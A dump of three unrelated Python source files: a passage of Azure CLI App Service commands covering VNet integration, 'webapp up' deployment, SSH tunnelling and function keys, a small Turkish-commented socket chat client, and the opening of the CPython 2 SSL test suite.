id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, kind="app", properties=app_metadata.properties)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
raw=True)
result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
client.py | from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread, Lock
import time
class Client:
"""
Server ile iletişimi sağlar.
"""
# GLOBAL CONSTANTS
HOST = "localhost"
PORT = 5500
BUFSIZE = 512
ADDR = (HOST, PORT)
def __init__(self, name):
"""
Objeleri tanımlar ve name parametresinin mesajını server'a yollar.
:param name: str
"""
self.messages = []
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect(self.ADDR)
client_thread = Thread(target=self.receive_message)
client_thread.start()
self.send_message(name)
self.lock = Lock()
def receive_message(self):
"""
Server'dan gelen mesajı alır.
:return: None
"""
while True:
try:
msg = self.client_socket.recv(self.BUFSIZE).decode("utf8")
self.lock.acquire() # kilitler
self.messages.append(msg)
self.lock.release() # kilidi açar
except Exception as e:
print("[HATA]", e)
break
def send_message(self, msg):
"""
Kullanıcının mesajını server'a iletir.
:param msg: str
:return: None
"""
self.client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
self.client_socket.close()
def get_messages(self):
"""
:returns str tipinde mesajların bulunduğu list döndürür.
:return: list[str]
"""
messages_copy = self.messages[:] # kopyalar
# hafızanın mesajlara erişiminin güvenliğini sağlar
self.lock.acquire()
self.messages = []
self.lock.release()
return messages_copy
def disconnect(self):
self.send_message("{quit}")
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import test_support
import asyncore
import socket
import select
import time
import gc
import os
import errno
import pprint
import urllib, urlparse
import traceback
import weakref
import functools
import platform
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
ssl = test_support.import_module("ssl")
HOST = test_support.HOST
CERTFILE = None
SVN_PYTHON_ORG_ROOT_CERT = None
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if test_support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
# We need to access the lower-level wrapper in order to create an
# implicit SSL context without trying to connect or listen.
try:
import _ssl
except ImportError:
# The returned function won't get executed, just ignore the error
pass
@functools.wraps(func)
def f(*args, **kwargs):
try:
s = socket.socket(socket.AF_INET)
_ssl.sslwrap(s._sock, 0, None, None,
ssl.CERT_NONE, ssl.PROTOCOL_SSLv2, None, None)
except ssl.SSLError as e:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')
and 'Invalid SSL protocol variant specified' in str(e)):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
#ssl.PROTOCOL_SSLv2
ssl.PROTOCOL_SSLv23
ssl.PROTOCOL_SSLv3
ssl.PROTOCOL_TLSv1
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
def test_random(self):
v = ssl.RAND_status()
if test_support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE, False)
if test_support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subject'],
((('countryName', u'US'),),
(('stateOrProvinceName', u'Delaware'),),
(('localityName', u'Wilmington'),),
(('organizationName', u'Python Software Foundation'),),
(('organizationalUnitName', u'SSL'),),
(('commonName', u'somemachine.python.org'),)),
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if test_support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 2.0
self.assertLess(n, 0x20000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 2)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 26)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by OpenSSL, the format might change
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
def test_ciphers(self):
if not test_support.is_resource_enabled('network'):
return
remote = ("svn.python.org", 443)
with test_support.transient_internet(remote[0]):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")
s.connect(remote)
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")
s.connect(remote)
# Error checking occurs when connecting, because the SSL context
# isn't created before.
